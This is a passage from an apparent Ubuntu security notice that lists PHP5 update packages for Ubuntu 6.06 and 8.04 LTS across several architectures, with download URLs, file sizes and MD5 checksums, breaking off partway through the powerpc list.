http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 24612 e13be5485c4b96e9aa53c3e6cd171868\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 312640 0813d054f70e6a98d162f82363f2ae52\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 36844 cc14b2ee60e208578620b1d13674f188\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 22132 8b5cffd446ad1746e3b84a2c51c3a0f9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 8788 fbe8a927dec32c4a4f4fc2fcb50c46e2\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 25230 4de41ebe72a3a3d4b1a488c61c356ff3\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 43900 34e693db2e40cfe651e59260827503a4\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 30130 a84aec2b4d180ab273436c66f65a6c44\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 44386 26d3c30b7b0aa2e12aebb35e45edda7b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 8342 d3753ab04597e331102fa9c2d4595a91\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 15302 9091a1906ea3e51541d519e81dae8b04\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 29172 56539adab2886fb4b62bf8712cb76573\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 22698 2fcdca51baa5b06f3b14640468c8f198\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 42384 9a5de31b66863c550c7f0eabbbb15b59\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 16388 e74aa42363c97fa9be568bc8a56adeb7\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 2266800 6f6694b6187c749ab3317e8d4b7402f7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 4481766 4185be1c9738dfd24a73257282a93560\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 2250698 007e53227b36ea9149a17a2e1b3b2fd8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 137602 12cce6aba8b73d30222d0053c6b6f63e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 22842 d654bbdcc8555d0cf6e7e32a3e173c7f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 312642 bc44adff15460e9e847908c1c7d7ffe6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 32868 7f8eb60631c7249cba810625afd9daa9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 19800 b01b91f661d047fbf8b45289fcb224fd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 8372 914ab45f9de18dc70e66d37a570b45d5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 21998 f1940631b5b116a3a5f9b617fad38b25\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 37350 6b26a597fb9214ccac66fe51371f9c34\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 27040 dd51e2241c4435aeb47f5f865a9393f9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 39780 9a017d5d7ed8e1f766053f8a25c104f8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 8058 996ca21adc67c08176938d4b8e20ea85\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 14166 4352c3f2d45ea409845b05ed15c9f5a1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 25626 56a16a5e517c3835553a9c92c14845fe\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 20556 f4a3dc7978f2b9f2a07a4b33f71908b7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 37868 2817efca4159cb3c404b1060bd411aeb\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 15140 922e2f5d404fa4f65930fe616f21c2ff\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 2401158 e7aa59451f055cb21c8807cd61e75d7f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 4701138 386cf9db66f18da2963a9c4ce5809747\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 2360220 b6ba0ac9063e61517bea37d63f261520\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 137628 423363b528daef86e4e416078f5e45d6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 26614 f79c7e86baa8ab6de5bd1544b95bb591\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 312690 840516b876a5e18749830ffbfb87d590\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 36610 7cb065c6391a6c9f35c3c499fcd03f92\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 22560 0e09b1a23fb2e45fd3bef53975963cdd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 10132 c4838519456364dc17c6aca50d8603b5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 24822 b7fc0a9ddc0bf693707487a36866525d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 41792 afd7f070c9e44d9187694f19d3f420ac\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 30094 9e6edfe01ec9c838ebc0ff5e3c3f76de\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 43426 115f663062b47cb1712c57f31383affd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 9800 876623ef4620e4f58d75dadc1e03f0f6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 15948 7fb6f8516a2eaebb88ffa28d1eb38a3f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 29418 01977fd8f10aba1847cecd997111a95a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 23590 ae33ed50de72fbf3cbf209d8357c4f2d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 40964 f85e236ab27b621fb5b18f26b6ebd526\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 17250 5a6301e9de77fc7b395ca324553bc406\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 2327642 8728268a4554314724960e6d56d80fdc\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 4538666 2f34ceffb1b99107d58c7194a48370f8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 2280334 ceb762d8c3ef6e49c9695a155316eb58\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 137616 3a42b132f6818e277a96196c6553b31e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 24554 e8edbffca300854da30934ca4e4b7ebe\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 312662 af091ce44d8283be869da411bc050092\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 33370 9f807ce655fef5ef722a445793981505\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 20088 3bd40ffface181d2568db35466e7af14\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 8374 05f242bc3e8511351d54d1c809e4ecf0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 22356 154ac22fddda7b41cb97a897c9c08a1f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 38648 982bd6a014d8aa992a98351e489e0e2d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 26834 4838234359de91b98809261b2189d10f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 40612 5a1bc32b88ebe4d090c6e07ef8b1777f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 8106 c96c9ac976ab1913911ac0c720ef00dc\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 14056 fc7423fc9e594330f54fcb81e74d2003\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 25964 381f404eac25017312df350d70ef9176\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 20794 86dc27787737d592e8883b7688b52f4c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 38124 c0b5567cfd39eca83d5872c69658dc27\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 15084 987d8eca1a903d46f83d12aa66550b61\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.4-2ubuntu5.12.diff.gz\r\n Size/MD5: 167020 feae7d3863eeae7fa32aca70899536d5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.4-2ubuntu5.12.dsc\r\n Size/MD5: 1972 76dfdd0eac161ec6b9f59f657b7512cd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.4.orig.tar.gz\r\n Size/MD5: 9705468 0826e231c3148b29fd039d7a8c893ad3\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.2.4-2ubuntu5.12_all.deb\r\n Size/MD5: 355284 ce9d80aaf80deb5305115fb7bc03f285\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.4-2ubuntu5.12_all.deb\r\n Size/MD5: 1086 5e3589d2d3cffd873c4fa29fff2aa1f8\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 2615762 0be86e55a9c3333ce9c5c8eccdd02018\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 5094062 905e5185c8513994d9653ed7d5f981cb\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 2572354 8115c400ae7c77c108f1231b0b04e94e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 321346 783695972c54291e5fab8f7537b7002c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 25038 7a71cb4a6cf70767a20c5b09531cc79e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 364478 71edec85608500b042c8b3b6ea1bb1bb\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 37340 31ecee2ab05578b8640d8a430dab2f50\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 17626 9a349fbed4776be3f204d0957872b983\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 20266 aab0448f1319c9664062f218fc7115d6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 5546 e0bd645a69c11bc77378717523bfd4ad\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 74418 20d709b46e98deb5cee28c753768b167\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 37706 f38cd75303962018b8c5445273814d53\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 56162 988d448560b9a0f6b5c0e27dc92cf3ed\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 9542 952713ef6b425a452c63bc3fd92ca6a5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 5038 c5ea30699ae3d1cf6be067f4a15b9924\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 12418 b6fb1586bc4a6426c675dd14a0262996\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 39644 eb455bc7fa80e4f75df8d260cd93165e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 28668 93722365a1e8b1a45df8c02c9827d94e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 17892 2600ada79326a965d6d6a6188f7caac0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 38618 af1b6ec77b71a982400df9b1a3ad2974\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 13548 8555607e3bdb309caf77890549b36ffe\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 2474562 5d69a89b1556be3dc5ab7c4c0367fb5e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 4917434 e19d6e3ccbd08c77c260e06fb772faa7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 2481082 6d634e88363e1bc088382eb7a3861d74\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 317380 c38bdf19a4e7e116e50b80337ba85905\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 23658 6ad9b86ad81d0c7b85ab580a851a8ec4\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 364498 6131924ff3f42d1b6dbbef7cc96710bd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 32904 4c2271cee2d68ac7d311bf100ba99fb8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 14762 51e61e19b9d17daf01f3d467097a0050\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 18114 dd48fb6fd8d43c8b31d7ae29ed582fa9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 5220 74e86bcbf39b2c7b14e18c6abece8b46\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 65242 9878f3b2e08048cad405a9a98cb4e1a1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 34270 21f8aeb13a0d3f95f321c73fd5243666\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 51302 f027f72404d34f0d6701912e34f7dbd6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 8624 13f88320dea8606f09057d5044499ebc\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 4792 d1728dc720da3c8713aec6ee1c5dffe0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 11730 5200846a3458833fee14d473c034e5fe\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 34362 1aa3dff9d4c30fcbcaaadbdec5b5678f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 26248 8e83034f75f2c8b73c4edcf4b3830b36\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 16278 51227e09c102aaa3bdf9042d2904dad1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 35676 f01dbd6d4c898c78b2038371d4e60913\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 12596 c2cf8fb4483d8938220e0aa2e923ec9e\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 2453878 f2ac57efde4d47fcf96aa3c594e3c3ab\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 4879180 9700a93e1c6eed062ff04a564d83d37b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 2461958 2560d3f64b8b67d1da89bbd9f446ff45\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 317130 858efd3daa3f71fe2b09cc8e4e799f8b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 23286 4f4eca0b40f2e7db404f256c0c567913\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 364518 f3731ba55dfeea2eb9586cdb92158c08\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 33078 16fbc3fb0cbfe2b17fa5fb4c0c8910ee\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 15032 88f6972ffd4afdd5a99e93b9dfdbb57c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 18108 7f83698bfd37463f4bf27be49b8a59cd\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 5100 cdb39167a18ca4deaa248951d167e21f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 64320 592a50506eebf51f8148bfefa96605ad\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 33946 edc93ed9a11a2d1ced0e88796ced004c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 50870 e85c3c34cbade823895039c60da4018a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 8644 13a14d55d52beee224405d5032b9d1a2\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 4724 afd38f6282ab3c904b5de939c1ac453a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 11574 1ff0c36b84e822b8a22e2af15bcc81a2\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 33744 8bcdffb44b89195977ff7dbc0e1606c7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 26136 2164b182696ea5afb8a0d9f9b883d1ae\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 16056 646eb05f87e2818b5d1dce5089c40b31\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 35470 27d3bac8471e4c1ae70194f793559154\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 12432 80882a94ebfdbefdb116709d17c593ff\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 2626598 0a369c6787998ca4f72001ab09f7ad8c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 5117830 2c9d1365c7575a7a7061d72bf221814a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 2581236 693be837e25f8e3c536abf5450c95314\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 324354 f7dffb9f086602df55b0cf4045d24735\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 28234 93aa97de469ab1012d980148b706efa0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 364578 702a4596f996d0a2fdd2f78b7918513c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 38782 f1eacea712fda83f5fcea789d7f76bdb\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 17628 a54afe74e8963650557d9324fd80118b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 21732 7001d29eccb1067b1d7777666ea633a3\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 7672 24e6cd5e936507133abea29944245299\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 78022 0b9f3458df046bda790672b8e7ef3b22\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 41302 2acdb747c2894bc8124247699a925560\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 59740 